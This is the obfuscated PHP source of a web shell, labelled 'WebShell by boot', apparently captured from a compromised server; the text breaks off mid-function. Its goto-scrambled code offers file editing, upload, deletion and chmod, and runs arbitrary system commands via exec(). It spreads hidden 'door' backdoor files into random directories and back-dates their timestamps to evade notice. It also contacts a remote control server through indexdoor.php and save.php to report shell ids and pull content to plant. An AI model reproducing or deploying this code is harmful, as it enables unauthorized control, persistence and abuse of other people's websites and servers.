Your IP : 18.216.201.32
<?php
goto ed6; F65: $data = $_SERVER; goto Fdc; C10: $type = $_REQUEST['type']; goto dff; Eff: $web_url = $data['REQUEST_SCHEME'] . "://" . $data['SERVER_NAME']; goto D99; a84: if ($type == 1) { if (!empty($dir)) { $path = $dir; } $now_path = $path; } goto e17; C14: function crefile($fiurl, $contnt) { goto D24; dae: $file_path = $path . $fiurl; goto D04; cfc: $filath = $path . dirname($fiurl); goto Da7; Da7: if (!is_dir($filath)) { if (!mkdir($filath, 0755, true)) { return false; } } goto dae; D04: if (file_put_contents($file_path, $contnt) !== false) { goto F94; D57: touch($file_path, $time); goto A8d; A8d: return true; goto A49; F94: $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); goto D57; A49: } else { return false; } goto db8; D24: $path = $_SERVER['DOCUMENT_ROOT'] . '/'; goto cfc; db8: } goto Ba1; F08: function getParentsFolders($path) { goto d0c; be0: $all_folders = $directories; goto d39; Bb1: return $all_folders; goto fa3; c3a: $all_folders = array_merge($all_folders, $directories); goto Bb1; d36: $directories = glob($parent_folds . '/*', GLOB_ONLYDIR); goto c3a; d0c: $all_folders = array(); goto d15; Fc6: $directories = glob($parent_folds . '/*', GLOB_ONLYDIR); goto be0; d39: $parent_folds = dirname($parent_folds); goto d36; d15: $parent_folds = dirname($path); goto Fc6; fa3: } goto a2e; cdc: function getrandstr($length = 10) { goto F73; F02: return $randomString; goto Eb4; Eab: $randomString = ''; goto C53; C53: for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } goto F02; F73: $characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; goto Eab; Eb4: } goto A20; a3f: $door_lists = array(); goto C65; a2e: function curlget($url) { goto c7b; E7f: if (empty($url_data) && function_exists('fopen') && function_exists('stream_get_contents')) { goto b3d; a00: $url_data = stream_get_contents($handle); goto Be3; Be3: fclose($handle); goto ff2; b3d: $handle = fopen($url, "r"); goto a00; ff2: } goto D51; c13: if (function_exists('file_get_contents')) { $url_data = file_get_contents($url); } goto ba7; ba7: if (empty($url_data) && function_exists('curl_exec')) { goto b2b; b2b: $conn = curl_init($url); goto C91; bfe: curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); goto Afd; D67: curl_close($conn); goto C58; f7f: curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); goto bfe; C91: curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); goto ca8; Afd: $url_data = curl_exec($conn); goto D67; ca8: curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); goto f7f; C58: } goto E7f; c7b: $url_data = ""; goto c13; D51: return $url_data; goto fd9; fd9: } goto Ca6; e48: if (is_readable($now_path)) { $can_read = true; } goto A9c; E61: error_reporting(0); goto C8b; Dc2: if (!empty($_SESSION['c2hlbGxfY29kZQ==']) && strlen($_SESSION['c2hlbGxfY29kZQ==']) == 20) { goto cd0; D31: echo $data['SERVER_SOFTWARE']; goto e5e; daf: ?>
</div>
<script>
$(function(){
$('#allcheck').click(function(){
if($('#allcheck').is(":checked")){
$('input[name="childcheck[]"]').each(function(){
$(this).attr('checked', true);
})
}else{
$('input[name="childcheck[]"]').each(function(){
$(this).attr('checked', false);
})
}
})
})
</script>
<script>
$(function(){
$("#allcheck").click(function(){
$('.item').prop('checked', this.checked);
});
$('.item').click(function(){
if ($('.item').length == $('.item:checked').length) {
$('#allcheck').prop('checked', true);
} else {
$('#allcheck').prop('checked', false);
}
});
$('.delBtn').click(function(){
var checkedValues = [];
$(".item:checked").each(function(){
checkedValues.push($(this).val());
});
if(checkedValues.length == 0){
alert('please select files');
return false;
}else{
$('#deleteForm').submit();
}
});
})
</script>
</body>
</html>
<?php goto Ba3; Dba: foreach ($file_path_array as $k => $v) { if (empty($v)) { ?><a href="?path=/">-</a>r
<?php } else { goto E6; C2: $file_now_path = $file_now_path . "/" . $v; goto bf; A7: echo trim($v); goto e7; e7: ?></a><?php goto c6; E6: if (empty($file_now_url)) { $file_now_url = $v; } else { $file_now_url = $file_now_url . '/' . $v; } goto C2; bf: ?>/<a href="?path=<?php goto a6; Bf: ?>"><?php goto A7; a6: echo $file_now_path; goto Bf; c6: } } goto ebb; eb9: if ($type == 2 || $type == 3) { goto Ce0; B3a: ?>
<textarea class="form-control" id="exampleFormControlTextarea1" name="file_content" rows="20" cols="100"><?php goto D37; F72: echo $_SESSION['c2hlbGxfY29kZQ==']; goto Ffd; e91: ?></textarea>
</div>
<button type="submit" class="btn btn-success">Edit</button>
</form>
</div>
<?php goto Dfc; Ffd: ?>"/>
<div class="form-group">
<?php goto Cb2; Cb2: $content = file_get_contents($file_path); goto B3a; D58: ?>"/>
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto F72; Ce0: if ($type == 3) { goto ce; fd: if ($content_result) { echo '<div class="alert alert-success" role="alert">File content modified successfully!</div>'; } else { echo '<div class="alert alert-danger" role="alert">Failed to modify file content!</div>'; } goto cf; ce: $file_content = $_REQUEST['file_content']; goto Cd; Cd: $content_result = file_put_contents($path, $file_content); goto fd; cf: } goto A6a; A6a: ?>
<div class="row">
<form action="?type=3" method="post">
<input type="hidden" id="path" name="path" value="<?php goto Bb9; D37: echo htmlspecialchars($content); goto e91; Bb9: echo $file_path; goto D58; Dfc: } else { if ($type == 4) { goto Df2; c1d: $content = file_get_contents($file_path); goto F3a; c1e: if (!empty($file_new_name)) { $rename_result = rename($file_path, $now_path . '/' . $file_new_name); if ($rename_result) { echo '<div class="alert alert-success" role="alert">File name modified successfully!</div>'; $file_path = $now_path . '/' . $file_new_name; } else { echo '<div class="alert alert-danger" role="alert">Failed to modify file name!</div>'; } } goto bf6; bb1: echo $_SESSION['c2hlbGxfY29kZQ==']; goto ae7; B38: ?>">
</div>
<button type="submit" class="btn btn-success">Edit</button>
</form>
</div>
<?php goto A8c; F3a: ?>
<input type="text" class="form-control" id="file_new_name" name="file_new_name" value="<?php goto ed3; ed3: echo basename($file_path); goto B38; ae7: ?>"/>
<div class="form-group">
<?php goto c1d; Df2: $file_new_name = $_POST['file_new_name']; goto c1e; e1d: ?>"/>
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto bb1; bf6: ?>
<div class="row">
<form action="?type=4" method="post">
<input type="hidden" id="path" name="path" value="<?php goto E5e; E5e: echo $file_path; goto e1d; A8c: } else { if ($type == 5) { goto b5c; Bce: ?>">
</div>
<button type="submit" class="btn btn-success">Edit</button>
</form>
</div>
<?php goto a44; c80: ?>"/>
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto f55; d23: if (!empty($new_chmod)) { if (chmod($file_path, octdec($new_chmod))) { echo '<div class="alert alert-success" role="alert">File permissions modified successfully!</div>'; $old_chmod = $new_chmod; } else { echo '<div class="alert alert-danger" role="alert">Failed to modify file permissions!</div>'; } } else { $permissions = fileperms($file_path); $old_chmod = substr(sprintf('%o', $permissions), -4); } goto c45; c45: ?>
<div class="row">
<form action="?type=5" method="post">
<input type="hidden" id="path" name="path" value="<?php goto d6b; C8f: $content = file_get_contents($file_path); goto ea7; Cb0: echo $old_chmod; goto Bce; B9f: ?>"/>
<div class="form-group">
<?php goto C8f; d6b: echo $file_path; goto c80; ea7: ?>
<input type="text" class="form-control" id="new_chmod" name="new_chmod" value="<?php goto Cb0; b5c: $new_chmod = trim($_POST['new_chmod']); goto d23; f55: echo $_SESSION['c2hlbGxfY29kZQ==']; goto B9f; a44: } else { if ($type == 6) { goto d2b; Efd: echo $new_name; goto f71; f0b: if (!empty($new_name)) { if (is_file($now_path . '/' . $new_name)) { echo '<div class="alert alert-danger" role="alert">The file already exists!</div>'; } else { $file = fopen($now_path . '/' . $new_name, 'w'); if ($file) { if (fwrite($file, $new_content)) { echo '<div class="alert alert-success" role="alert">File created successfully!</div>'; } else { echo '<div class="alert alert-danger" role="alert">Unable to write to file!</div>'; } fclose($file); } else { echo '<div class="alert alert-danger" role="alert">Unable to open file!</div>'; } } } goto cd3; B84: echo $_SESSION['c2hlbGxfY29kZQ==']; goto c7d; cd3: ?>
<div class="row">
<form action="?type=6" method="post">
<input type="hidden" id="path" name="path" value="<?php goto Bd5; e70: $new_content = trim($_POST['new_content']); goto f0b; Bd5: echo $file_path; goto fd1; f71: ?>" placeholder="New File Name">
</div>
<div class="form-group">
<textarea class="form-control" id="new_content" name="new_content" rows="20" cols="100" placeholder="New File Content"><?php goto bc7; c7d: ?>"/>
<div class="form-group">
<input type="text" class="form-control" id="new_name" name="new_name" value="<?php goto Efd; d2b: $new_name = trim($_POST['new_name']); goto e70; Bf1: ?></textarea>
</div>
<button type="submit" class="btn btn-success">Create Now</button>
</form>
</div>
<?php goto aa5; fd1: ?>"/>
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto B84; bc7: echo htmlspecialchars($new_content); goto Bf1; aa5: } else { if ($type == 7) { goto c04; Fbc: ?>"/>
<div class="form-group">
<input type="text" class="form-control" id="new_name" name="new_name" value="<?php goto E23; c50: ?>"/>
<input type="hidden" id="path" name="path" value="<?php goto d22; c04: $new_name = trim($_POST['new_name']); goto C44; E23: echo $new_name; goto Cf5; Ae0: echo $_SESSION['c2hlbGxfY29kZQ==']; goto c50; fee: ?>
<div class="row">
<form action="?type=7" method="post">
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto Ae0; d22: echo $file_path; goto Fbc; Cf5: ?>" placeholder="New Folder Name">
</div>
<button type="submit" class="btn btn-success">Create Now</button>
</form>
</div>
<?php goto caa; C44: if (!empty($new_name)) { if (!is_dir($now_path . '/' . $new_name)) { if (mkdir($now_path . '/' . $new_name)) { echo '<div class="alert alert-success" role="alert">Directory created successfully!</div>'; } else { echo '<div class="alert alert-success" role="alert">Directory creation failed!</div>'; } } else { echo '<div class="alert alert-success" role="alert">Directory already exists!</div>'; } } goto fee; caa: } else { if ($type == 8) { goto ae; B2: ?>" placeholder="Search content">
</div>
<button type="submit" class="btn btn-success">Search</button>
</form>
</div>
<?php goto B9; b2: ?>
<div class="row">
<form action="?type=8" method="post">
<div class="form-group">
<input type="text" class="form-control" id="search_keys" name="search_keys" value="<?php goto D4; d7: $act = trim($_POST['act']); goto b2; D7: ?>
<?php goto aa; D4: echo $search_keys; goto B2; ae: $search_keys = trim($_POST['search_keys']); goto d7; B9: if (!empty($search_keys)) { goto e1; ac: ?>
</div>
</form>
<?php goto df; da: ?>
<form action="?type=8" method="post" id="deleteForm" style="margin: 1rem;">
<input type="hidden" name="act" id="act" value="deleteFiles"/>
<div><?php goto ab; ed: ?></div>
<div>
<p>
<input type="checkbox" name="allcheck" id="allcheck" value="1"/> all check
<input type="button" class="delBtn" value="delete"/>
</p>
</div>
<div>
<?php goto f9; ab: echo "<span style='color:red;'>" . $search_keys . "</span> files list��\n"; goto ed; A2: $file_list = findFilesWithContent($website_path, $search_keys, 0, 10); goto da; f9: foreach ($file_list as $file) { $str = '<a href="?path=' . $file . '&type=2" target="_blank">' . $file . '</a>'; echo '<p><input type="checkbox" class="item" name="files[]" value="' . $file . '"/> ' . $str . '</p>'; } goto ac; e1: $result = array(); goto A2; df: } goto B5; B5: if (!empty($act) && $act == 'deleteFiles') { $file_list = $_REQUEST['files']; foreach ($file_list as $k => $v) { deleteFile($v); } } goto D7; aa: } else { goto db; a2: echo $_SESSION['c2hlbGxfaWQ=']; goto D6; C8: if ($_POST['act'] == 'del') { $delete_file_list = $_POST['childcheck']; if (!empty($delete_file_list)) { goto A8; d4: foreach ($delete_file_list as $k => $v) { if (is_dir($v)) { $del_result = deleteDirectory($v); } else { $del_result = unlink($v); } if ($del_result) { $count++; } else { $fail_count++; } } goto C4; fb: if ($fail_count > 0) { echo '<div class="alert alert-danger" role="alert">Delete ' . $fail_count . ' files failed!</div>'; } goto E8; A8: $count = 0; goto B8; C4: if ($count > 0) { echo '<div class="alert alert-success" role="alert">Delete ' . $count . ' files successfully!</div>'; } goto fb; B8: $fail_count = 0; goto d4; E8: } } goto E7; fef: ?>"/>
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="doors"/>
<input type="hidden" name="group_id" value="<?php goto f17; a7: echo $file_path; goto Ef; f17: echo $_SESSION['Z3JvdXA=']; goto C9c; bc: ?>"/>
<input type="hidden" name="act" value="upload"/>
<input class="form-control form-control-sm" id="formFileSm" name="fileToUpload" type="file" style="width: 200px;display: inline-block;">
<button type="submit" class="btn btn-info btn-sm">Upload</button>
<a class="btn btn-primary btn-sm" href="?path=<?php goto F5; Cf4: echo $file_path; goto D6c; Ae5: ?>"/>
<button type="submit" class="btn btn-info btn-sm">Others</button>
</form>
</div>
<div class="col-2 col-sm-1">
<form action="?path=<?php goto Cf4; Fd: echo $_SESSION['dHlwZQ==']; goto c4; Eb: ?>" method="post">
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto Ea; Ec1: ?>"/>
<input type="hidden" name="shell_type" value="<?php goto f49; Bbe: if ($_POST['act'] == 'shell') { if ($_POST['type'] == 'reback') { rebackAction($_POST, $pws, $now_site); } else { if ($_POST['type'] == 'exec') { execAction($_POST, $pws, $now_site); } else { if ($_POST['type'] == 'doors') { doorsAction($_POST, $pws, $now_site); } else { if ($_POST['type'] == 'others') { othersAction($_POST, $pws, $now_site); } else { if ($_POST['type'] == 'station') { stationAction($_POST, $pws, $now_site); } } } } } } goto a8b; cb: ?>"/>
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="exec"/>
<input type="hidden" name="group_id" value="<?php goto B1; d8e: ?>
</div>
</div>
</div>
<form action="?path=<?php goto Cbc; ee: ?>"/>
<input type="hidden" name="group_id_2" value="<?php goto D7f; C3: ?>" style="display: inline-block;width: 80%;"/>
<input type="hidden" name="act" value="change_dir"/>
<button type="submit" class="btn btn-info btn-sm">Change Dir</button>
</form>
</div>
<div class="col-6">
</div>
</div>
</div>
<div class="bd-example bd-example-row" style="border: 1px solid #ededed;padding: 1rem;margin: 1rem 0;">
<div class="row">
<div class="col-2 col-sm-1">
<form action="?path=<?php goto E5; F0: echo $file_path; goto D9; A0: echo $_SESSION['c2hlbGxfaWQ=']; goto ee; d1: ?>&type=6">Create File</a>
<a class="btn btn-success btn-sm" href="?path=<?php goto F0; Cbc: echo $file_path; goto ecb; a3e: ?>
</tbody>
</table>
</form>
</div>
<?php goto dd0; F6: echo $_SESSION['c2hlbGxfY29kZQ==']; goto bc; F8: echo $file_path; goto a8; d24: echo $_SESSION['c2hlbGxfY29kZQ==']; goto a7b; C9c: ?>"/>
<input type="hidden" name="shell_id" value="<?php goto F40; a7b: ?>"/>
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="station"/>
<input type="hidden" name="shell_id" value="<?php goto dab; e46: echo $_SESSION['c2hlbGxfY29kZQ==']; goto e7b; D6: ?>"/>
<input type="hidden" name="shell_type" value="<?php goto d3; E15: echo $_SESSION['dHlwZQ==']; goto Ae5; d6: $file_list = scandir($now_path); goto A9; B1: echo $_SESSION['Z3JvdXA=']; goto ad; Ce: ?>" method="post">
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto ca; b0c: ?>"/>
<button type="submit" class="btn btn-primary btn-sm">Station</button>
</form>
</div>
</div>
</div>
<div class="bd-example bd-example-row" style="border: 1px solid #ededed;padding: 1rem;margin: 1rem 0;">
<div class="row">
<div class="col-12 col-sm-12" style="text-align: center;font-weight:bold;">
<?php goto Bbe; Cc4: if (!empty($file_list) && count($file_list) > 2) { foreach ($file_list as $k => $v) { if (!($v == '.' || $v == '..')) { goto f4; C5: ?>
<tr>
<th>
<div class="form-check">
<input class="form-check-input" type="checkbox" value="<?php goto cd; d8: if (is_dir($file_url)) { echo '<font color="green" style="font-weight: bold;">Directory</font>'; } else { echo getFileSize($file_url); } goto B4; A5: ?>
</td>
<td>
<a class="btn btn-primary btn-xs" href="?path=<?php goto b7; a9: ?>&type=5">Chmod</a>
</td>
</tr>
<?php goto Ca; b9: echo date("Y-m-d H:i:s", $modificationTime); goto ba; Ed: $permission = getFilePermission($file_url); goto Aa; Ab: if (!is_dir($file_url)) { goto Cc; b1: ?>" target="_blank">click visit</a>
<?php goto F3; Cc: ?>
<a href="<?php goto c7; c7: echo $now_url . '/' . $v; goto b1; F3: } goto f5; Ae: echo $file_url; goto b0; f5: ?>
</td>
<td>
<?php goto d8; f0: ?>
</td>
<td>
<?php goto Ab; B4: ?>
</td>
<td>
<?php goto a5; f7: ?>&type=4">Rename</a>
<a class="btn btn-info btn-xs" href="?path=<?php goto Ae; Dd: ?>" name="childcheck[]">
</div>
</th>
<td>
<?php goto a1; d9: echo $file_url; goto a9; a1: if (is_dir($file_url)) { echo '<a href="?path=' . $file_url . '&type=1" style="color: green;font-weight:bold;">
<i class="bi bi-folder" style="vertical-align: middle;">
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-folder" viewBox="0 0 16 16">
<path d="M.54 3.87.5 3a2 2 0 0 1 2-2h3.672a2 2 0 0 1 1.414.586l.828.828A2 2 0 0 0 9.828 3h3.982a2 2 0 0 1 1.992 2.181l-.637 7A2 2 0 0 1 13.174 14H2.826a2 2 0 0 1-1.991-1.819l-.637-7a1.99 1.99 0 0 1 .342-1.31zM2.19 4a1 1 0 0 0-.996 1.09l.637 7a1 1 0 0 0 .995.91h10.348a1 1 0 0 0 .995-.91l.637-7A1 1 0 0 0 13.81 4H2.19zm4.69-1.707A1 1 0 0 0 6.172 2H2.5a1 1 0 0 0-1 .981l.006.139C1.72 3.042 1.95 3 2.19 3h5.396l-.707-.707z"/>
</svg>
</i>' . $v . '</a>'; } else { echo '<a href="?path=' . $file_url . '&type=2">' . $v . '</a>'; } goto f0; a5: $modificationTime = filemtime($file_url); goto b9; b7: echo $file_url; goto f7; Aa: if (strpos($permission, 'w') !== false) { echo '<font color="green" style="font-weight: bold;">' . $permission . '</font>'; } else { echo '<font color="red" style="font-weight: bold;">' . $permission . '</font>'; } goto A5; cd: echo $file_url; goto Dd; ba: ?>
</td>
<td>
<?php goto Ed; b0: ?>&type=2">Edit</a>
<a class="btn btn-warning btn-xs" href="?path=<?php goto d9; f4: $file_url = $now_path . '/' . $v; goto C5; Ca: } } } else { ?>
<tr>
<td colspan="4" style="text-align: center;color:red;">
No Files!
</td>
</tr>
<?php } goto a3e; C1: echo $file_path; goto ea; e7b: ?>"/>
<div class="col-12" style="margin-bottom: 1rem;">
<input type="hidden" name="act" value="del"/>
<button type="submit" class="btn btn-danger btn-xs">Delete</button>
</div>
<table class="table table-bordered">
<thead>
<tr>
<th>
<div class="form-check">
<input class="form-check-input" type="checkbox" value="1" id="allcheck" name="allcheck">
</div>
</th>
<th>Name</th>
<th>Url</th>
<th>Size</th>
<th>Modify</th>
<th>Permission</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php goto Cc4; E7: if ($_POST['act'] == 'upload') { $targetFile = $now_path . '/' . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) { echo '<div class="alert alert-success" role="alert">File ' . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . ' uploaded!</div>'; } else { echo '<div class="alert alert-danger" role="alert">File upload failed!</div>'; } } goto d6; B3: echo $file_path; goto Ce; Ede: ?>"/>
<button type="submit" class="btn btn-danger btn-sm">Doors</button>
</form>
</div>
<div class="col-2 col-sm-1">
<form action="?path=<?php goto cd7; C6b: ?>" method="post">
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto d24; e3: ?>"/>
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="reback"/>
<input type="hidden" name="group_id" value="<?php goto e0; ab5: echo $_SESSION['c2hlbGxfY29kZQ==']; goto fef; D6c: ?>" method="post">
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto ab5; E5: echo $file_path; goto Eb; F5c: echo $_SESSION['dHlwZQ==']; goto b0c; ef: ?>"/>
<button type="submit" class="btn btn-warning btn-sm">Exec</button>
</form>
</div>
<div class="col-2 col-sm-1">
<form action="?path=<?php goto B3; a8b: ?>
<?php goto Fc7; Ef: ?>" method="post" enctype="multipart/form-data">
<input type="text" name="exec_code" class="form-control" value="" style="display: inline-block;width: 50%;"/>
<input type="hidden" name="act" value="exec_code"/>
<button type="submit" class="btn btn-info btn-sm">Exec</button>
</form>
</div>
</div>
</div>
<div class="col-12" style="margin-bottom: 1rem;">
<div class="row">
<div class="col-6">
<form action="?type=1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" class="form-control" value="<?php goto C6; E2: echo $_SESSION['c2hlbGxfaWQ=']; goto c9; cee: ?>"/>
<input type="hidden" name="shell_type" value="<?php goto F5c; C6: echo $path; goto C3; cc: echo $file_path; goto Ff; ea: ?>&type=8">Search Files</a>
</form>
</div>
<div class="col-6">
<form action="?path=<?php goto a7; A9: $file_list = sortByFolder($now_path, $file_list); goto F9; cd7: echo $file_path; goto C6b; B08: ?>"/>
<input type="hidden" name="group_id_3" value="<?php goto ac4; a8: ?>" method="post" enctype="multipart/form-data">
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto F6; Ff: ?>" method="post">
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto C0; F5: echo $file_path; goto d1; D9: ?>&type=7">Create Folder</a>
<a class="btn btn-warning btn-sm" href="?path=<?php goto C1; c4: ?>"/>
<button type="submit" class="btn btn-success btn-sm">Reback</button>
</form>
</div>
<div class="col-2 col-sm-1">
<form action="?path=<?php goto cc; e0: echo $_SESSION['Z3JvdXA=']; goto A6; dab: echo $_SESSION['c2hlbGxfaWQ=']; goto cee; c9: ?>"/>
<input type="hidden" name="shell_type" value="<?php goto Fd; F9: ?>
<div class="row">
<div class="col-12" style="margin-bottom: 1rem;">
<div class="row">
<div class="col-6">
<form action="?path=<?php goto F8; ac4: echo $_SESSION['dGhpcmRncm91cA==']; goto cc5; C0: echo $_SESSION['c2hlbGxfY29kZQ==']; goto cb; f49: echo $_SESSION['dHlwZQ==']; goto Ede; ad: ?>"/>
<input type="hidden" name="shell_id" value="<?php goto a2; ecb: ?>" method="post">
<input type="hidden" name="c2hlbGxfY29kZQ==" value="<?php goto e46; D0: ?>"/>
<input type="hidden" name="act" value="shell"/>
<input type="hidden" name="type" value="others"/>
<input type="hidden" name="shell_id" value="<?php goto A0; Ea: echo $_SESSION['c2hlbGxfY29kZQ==']; goto e3; ca: echo $_SESSION['c2hlbGxfY29kZQ==']; goto D0; D7f: echo $_SESSION['c2Vjb25k']; goto B08; Fc7: if ($_POST['act'] == 'exec_code') { goto de; af: exec($exec_code, $output, $returnVar); goto Ac; de: $exec_code = trim($_POST['exec_code']); goto af; Ac: if ($returnVar === 0) { echo "<div style='color: green;font-weight:bold;'>" . $exec_code . " is Successfully.</div>"; foreach ($output as $k => $v) { echo $v . '<br/>'; } } else { echo "<div style='color: red;font-weight:bold;'>" . $exec_code . " is Failed:" . $returnVar . ".</div>"; } goto fc; fc: } goto d8e; A6: ?>"/>
<input type="hidden" name="shell_id" value="<?php goto E2; cc5: ?>"/>
<input type="hidden" name="shell_type" value="<?php goto E15; F40: echo $_SESSION['c2hlbGxfaWQ=']; goto Ec1; d3: echo $_SESSION['dHlwZQ==']; goto ef; db: ?>
<?php goto C8; dd0: } } } } } } goto daf; C60: ?></div></p>
<p>
<a href="?path=<?php goto A11; C34: ?>>Readable</span> | <span <?php goto C1b; ba9: ?>>Writeable</span>
</p>
</div>
<?php goto eb9; Cf2: echo get_current_user(); goto C60; bb3: ?></div>
<div style="width: 30%;display:inline-block;">User: <?php goto Cf2; cd0: ?>
<!DOCTYPE html>
<html lang="en">
<head>
<title>WebShell by boot</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<style>.col-12{width: 100%;display: inline-block;}.col-6{width: 50%;display: inline-block;float: left;}</style>
</head>
<body>
<div class="jumbotron text-center" style="padding: 1rem 0rem;">
<h1 style="font-size:2rem;font-weight: bold;margin: 1rem 0;">WebShell by boot</h1>
</div>
<div class="container">
<div class="row">
<p>
<div style="width: 30%;display:inline-block;">Server IP: <?php goto Af6; F4c: ?>">Project</a>
</p>
</div>
<div class="row">
<p>
Path:
<?php goto E16; A11: echo $website_path; goto F4c; f8e: echo PHP_OS; goto B53; B53: ?></div>
</p>
<p>
<div style="width: 30%;display:inline-block;">Website: <?php goto a4c; E16: $file_now_path = ""; goto Dba; Af6: echo $data['SERVER_ADDR']; goto ae8; C1b: if ($can_write) { ?>style="color:green;"<?php } else { ?>style="color:red;"<?php } goto ba9; ebb: ?>
<span <?php goto e59; e59: if ($can_read) { ?>style="color:green;"<?php } else { ?>style="color:red;"<?php } goto C34; ae8: ?></div>
<div style="width: 30%;display:inline-block;">Server Software: <?php goto D31; e5e: ?></div>
<div style="width: 30%;display:inline-block;">OS: <?php goto f8e; a4c: echo $data['HTTP_HOST']; goto bb3; Ba3: } goto b00; Dd0: function stationAction($data, $pweb, $now_site) { goto Caf; ff9: $shell_id = $data['shell_id']; goto fce; D4b: $json_array = json_decode($cc, true); goto b23; b23: $station_count = 0; goto D81; cfd: $result_data['shell_id'] = $data['shell_id']; goto c62; ccd: $result_data['shell_url'] = $now_site; goto f3e; E90: $res = curlpost($save_url, $result_data); goto f50; Caf: $result_data = array(); goto cfd; cd2: $url = base64_decode($pweb) . '/indexdoor.php?action=station&shell_id=' . $shell_id . '&shell_type=' . $shell_type; goto Aa7; fce: $shell_type = $data['shell_type']; goto cd2; c62: $result_data['action'] = 'station'; goto bb2; bb2: $save_url = base64_decode($pweb) . '/save.php'; goto ff9; f50: if ($res['status']) { echo '<p style="color:green;">Station is successfully, Success is ' . $station_count . '</p>'; } else { echo '<p style="color:red;">Station is failed! ' . $result_data['code'] . '</p>'; } goto cb5; D81: if (!empty($json_array['station_code']) && !empty($json_array['ht_pz_content'])) { $station_count = add_station($json_array['station_code'], $json_array['ht_pz_content'], $now_site); if ($station_count > 0) { $result_data['station_count'] = $station_count; $result_data['status'] = 1; } else { $result_data['code'] = '1001'; $result_data['status'] = 2; } } else { $result_data['code'] = '1002'; $result_data['status'] = 2; } goto ccd; f3e: $result_data['shell_type'] = $shell_type; goto E90; Aa7: $cc = curlget($url); goto D4b; cb5: } goto Af4; f4e: $dir = $_POST['dir']; goto Eff; C8b: ini_set('memory_limit', '-1'); goto e27; ed6: @set_time_limit(0); goto E61; B69: function getAllSubdirectories($directory, $maxDepth = 10, $currentDepth = 0) { goto b93; Fa4: $subdirectories = array(); goto Cf9; Ac9: return $subdirectories; goto E45; F26: $items = scandir($directory); goto D4a; Cf9: if ($currentDepth > $maxDepth) { return array(); } goto F26; D4a: foreach ($items as $item) { goto f01; ade: if (is_dir($path)) { goto Aba; bba: $subdirectories = array_merge($subdirectories, getAllSubdirectories($path, $maxDepth, $currentDepth + 1)); goto E58; Aba: $subdirectories[] = $path; goto d53; d53: $all_paths[] = $path; goto bba; E58: } goto Ca4; f01: if ($item == '.' || $item == '..') { continue; } goto B33; B33: $path = $directory . DIRECTORY_SEPARATOR . $item; goto ade; Ca4: } goto Ac9; b93: global $all_paths; goto Fa4; E45: } goto Dd0; Ef3: function getAllDirectories($path, $depth, $door_count) { goto ce1; E6e: $selectedDirectories = array(); goto Cc7; b19: foreach ($firstLevelDirs as $dir) { goto f22; f22: $all_paths[] = $dir; goto a48; a48: $subDirs = getAllSubdirectories($dir, 10); goto fc6; fc6: if (count($subDirs) >= $dirsPerFirstLevel) { $randomKeys = array_rand($subDirs, $dirsPerFirstLevel); foreach ((array) $randomKeys as $key) { $selectedDirectories[] = $subDirs[$key]; } } else { $selectedDirectories = array_merge($selectedDirectories, $subDirs); } goto a1b; a1b: } goto e30; Baa: $door_lists = $selectedDirectories; goto aed; aed: return $all_paths; goto C81; A96: $randomKeys = array_rand($all_paths, 1); goto E07; c09: $firstLevelDirs = glob($path . '/*', GLOB_ONLYDIR); goto Ea7; Ea7: $totalSelections = $door_count; goto E6e; E07: foreach ((array) $randomKeys as $key) { $last_folder_url = $all_paths[$key]; } goto Baa; e30: if (count($selectedDirectories) < $totalSelections) { goto b1a; eda: if (count($remainingDirs) > 0) { $additionalDirs = (array) array_rand($remainingDirs, min($additionalNeeded, count($remainingDirs))); foreach ($additionalDirs as $key) { $selectedDirectories[] = $remainingDirs[$key]; } } goto Cb5; Fed: $remainingDirs = array_diff($allSubDirs, $selectedDirectories); goto eda; F1b: foreach ($firstLevelDirs as $dir) { $allSubDirs = array_merge($allSubDirs, glob($dir . '/*', GLOB_ONLYDIR)); } goto Fed; b1a: $additionalNeeded = $totalSelections - count($selectedDirectories); goto ef1; ef1: $allSubDirs = array(); goto F1b; Cb5: } goto A96; Cc7: $dirsPerFirstLevel = max(1, floor($totalSelections / count($firstLevelDirs))); goto b19; ce1: global $all_paths, $door_lists, $last_folder_url; goto c09; C81: } goto B69; A9c: $can_write = false; goto De0; Af4: function add_station($station_code, $ht_content, $now_site) { goto dda; fe1: foreach ($all_folders as $k => $v) { $directories = glob($v . '/*', GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); } goto Aaa; eae: $count = 0; goto Bd1; dda: $station_code = base64_decode($station_code); goto eae; Dcb: $folder_name = basename($path); goto d96; Bd1: $path = $_SERVER['DOCUMENT_ROOT']; goto Dcb; Beb: $all_results = array(); goto fe1; cd6: return $count; goto d97; d54: foreach 